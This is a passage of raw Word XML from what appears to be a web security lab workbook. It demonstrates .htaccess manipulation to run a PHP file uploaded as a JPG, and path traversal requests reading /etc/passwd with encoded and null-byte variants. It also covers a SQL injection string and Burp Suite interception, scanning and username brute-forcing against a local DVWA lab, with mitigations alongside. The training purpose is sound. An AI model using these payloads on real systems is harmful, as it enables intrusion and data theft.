    <w:p w14:paraId="12653B4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TRACE / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A0E53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Host: localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787676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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3097634A"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Risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Can access sensitive headers including cookies via JavaScript in certain browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8EB8B"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Mitigation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>TraceEnable Off</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Apache configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49010F48"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4: .htaccess/.web.config Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B42A8D"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Apache (.htaccess):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1448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If .htaccess is writable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713FD38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-X PUT http://localhost/.htaccess -d 'AddType application/x-httpd-php .jpg'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3AB81"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F7414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Upload PHP as JPG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F998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-X PUT http://localhost/image.jpg -d '&lt;?php phpinfo(); ?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2901C95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965E7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Execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2836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http://localhost/image.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667B22C"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IIS (web.config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B453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Similar exploitation with web.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E09F80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Upload malicious XML configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C600F"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4.3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is .htaccess/.web.config modification critical? What access does it grant?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717E0F8A"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5: Path Traversal in Web Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C27172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Test path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFC39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http://localhost/download.php?file=../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEED62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99E09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Encoded variants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A05E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"http://localhost/download.php?file=..%2F..%2F..%2Fetc%2Fpasswd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D245B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C9578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Double encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7830561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"http://localhost/download.php?file=..%252F..%252F..%252Fetc%252Fpasswd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7162E3E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CEF0C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Null byte (older PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F91CD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lastRenderedPageBreak/>
        <w:t>curl "http://localhost/download.php?file=../../../../etc/passwd%00.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3AC95"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Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890B97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PHP - Secure file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328662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$file = basename($_GET['file']);  // Remove directory components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE377B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$file = str_replace(['..', '/'], '', $file);  // Remove dangerous chars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473FB5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$filepath = realpath('/var/www/uploads/' . $file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E5FC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2CEB9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Verify file is within intended directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455811B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if (strpos($filepath, '/var/www/uploads/') !== 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EABB8D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die('Invalid file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE445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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1186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include($filepath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41C384"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4.4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What files are accessible via path traversal on Linux vs. Windows systems?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF67D4A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="76E8E6A7">
          <v:rect id="_x0000_i1031" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71314DA8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACTIVITY 5: BURP SUITE PROXY &amp; SCANNER INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D14B4"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Learn to use Burp Suite for web application testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588FFBCE"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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 90 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BBF371"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Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intermediate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376F538"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1: Burp Suite Installation &amp; Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA1D8A"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Download:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C19CF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Community Edition: https://portswigger.net/burp/communitydownload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB722DE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Installation: Follow prompts, requires Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1847B"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Launch Burp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55041077"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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F87E6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./burpsuite_community.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315DF61"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275B4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Or use Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5F19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burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170E653"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2: Configure Browser Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6340BCCA"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Firefox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45978BE4" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Settings → Network Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE8E75" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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xml:space="preserve">Manual proxy configuration: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BF62C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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HTTP Proxy: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFBD65" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B418323" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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lastRenderedPageBreak/>
        <w:t>Check "Also use for HTTPS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50BF71"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Chrome/Chromium:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD10E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Launch with proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0ECA0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google-chrome --proxy-server="http://127.0.0.1:8080"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A6E4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146E21"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Or configure system proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1E2F2"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Burp Settings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC3A99" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Proxy → Listener Settings (verify port 8080)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860F3E0" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Import CA certificate for HTTPS traffic (Proxy → CA certificate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A788841"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3: Intercept HTTP Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D100213" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Enable Interception:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy → Intercept tab → "Intercept is on"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C7249" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Navigate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Visit http://localhost/ in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26293D21" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Examine Request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171ACFF7" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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GET /login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0Cookie: PHPSESSID=abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8FA50" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Modify Request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change parameters, headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F97C91F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Forward:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Click "Forward" to send to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B800E"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Exercise 5.1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C7219" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Intercept login request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F22132" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Modify username from "admin" to "test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0353B" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Change password parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33370FDF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Observe server response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268A62A"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5.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What happens when you modify credentials in transit? Does it bypass authentication?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BB9663"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4: Use Burp Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E853AD8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Send to Repeater:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Right-click intercepted request → Send to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F3301" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Repeater Tab:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify request manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C49297" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Send Request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Click "Send"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713893E7" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Analyze Response:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> View raw/prettified response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228EF816"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Example: Test SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D01E8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GET /login.php?user=' OR '1'='1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082F5C1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Host: localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED73D1"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5.2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Does the application show error messages revealing SQL structure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80E400"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5: Burp Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7D45B"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Passive Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A6061" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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lastRenderedPageBreak/>
        <w:t>Enable "Passive scanning" in Scanner settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F30415A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Browse application normally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09480AEA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Burp analyzes traffic for vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD77818" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Results appear in Scanner → Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0426F655"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Active Scanning (Dangerous - only on authorized targets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4C489" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Select request in Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B4BBAC" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Right-click → "Do active scan"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589091A5" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Set scan scope carefully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3050D1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Review findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01992EA8"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Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F9681" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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5.3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What vulnerabilities does Burp identify in DVWA?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DCAE6" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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5.4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which findings are false positives? How do you verify?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463DBE7C"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6: Intruder for Parameter Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C16839" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Select Request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capture in Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC82FFF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Send to Intruder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Right-click → Send to Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E60294" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Set Payload Position:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Highlight parameter to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FDE9C4" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Select Attack Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FDE3AA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Sniper: One payload position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113B3F9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Battering ram: Multiple same payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC084F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Pitchfork: Multiple different payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907A906" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Cluster bomb: Cartesian product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC26F8"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Example: Username Brute-force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FBF21"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GET /login.php?user=FUZZ&amp;pass=password HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E740FF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Host: localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559501F8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Mark "FUZZ" as payload position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50796A60" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Load usernames wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2B233" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Set "Grep Match" to find success pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AB39BF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Run attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D351D0"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5.5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
